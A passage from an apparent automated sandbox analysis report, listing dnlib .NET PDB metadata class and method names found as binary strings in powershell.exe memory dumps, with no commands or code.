                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000B.00000002.1476246463.00007FFAAC5C0000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.pdb source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
